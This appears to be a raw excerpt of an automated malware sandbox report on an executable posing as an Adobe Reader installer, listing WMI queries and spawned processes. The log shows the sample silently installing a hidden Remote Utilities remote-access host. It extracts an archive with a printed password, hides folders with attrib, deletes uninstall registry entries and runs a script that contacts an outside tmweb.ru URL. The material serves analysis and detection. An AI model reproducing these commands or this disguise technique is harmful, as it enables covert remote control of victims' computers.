Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Reads ini filesShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the Windows registered organization settingsShow sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding AA4D321CBB51DB47279651D4C4A42DCE C
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding 811B175E7191221789A53427DBAD15F3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe'
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {0EBC3A93-A818-47F5-837A-5A0A478FB651} S-1-5-21-290172400-2828352916-2832973385-1001:computer\user:Interactive:[1]
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding 2EDF85C04E0081D90ED7293C0FDDF85C C
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\MsiExec.exe -Embedding F7FCF8C7FA5995D0F2A8BA3C03B96EE9
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C '7zaa.exe'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'armstall.exe'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rutserv.exe'
Source: unknownProcess created: C:\inst_fold\7zaa.exe 'C:\inst_fold\7zaa.exe' x -oC:\inst_fold -pdsiSDJJiojeflOSIOwp3#DSIJ23jeewE@_SDD_as2 C:\inst_fold\arm.7z
Source: unknownProcess created: C:\inst_fold\fp.exe 'C:\inst_fold\fp.exe'
Source: unknownProcess created: C:\inst_fold\armstart.exe 'C:\inst_fold\armstart.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe 'C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe' /rsetup
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armgrd.bat' '
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armsettings.bat' '
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\*.*'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\inst_fold'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\inst_fold\armstatus.exe'
Source: unknownProcess created: C:\inst_fold\armforce.exe 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\inst_fold\armstart.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat'
Source: unknownProcess created: C:\Windows\System32\reg.exe reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E945283B-758C-4A40-B851-1066D0E49EA8} /f
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\regedit.exe regedit /s 'C:\inst_fold\armfix.reg'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\reg.exe reg import 'C:\inst_fold\armfix.reg' /reg:64
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\inst_fold\armforce.exe 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe unknown
Source: unknownProcess created: C:\inst_fold\armstatus.exe 'C:\inst_fold\armstatus.exe' 1 C:\inst_fold\armdaemon.js
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1''
Source: unknownProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Source: unknownProcess created: C:\Windows\System32\attrib.exe ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi'
Source: unknownProcess created: C:\Windows\System32\attrib.exe ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\attrib.exe ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' cls'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' cls'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
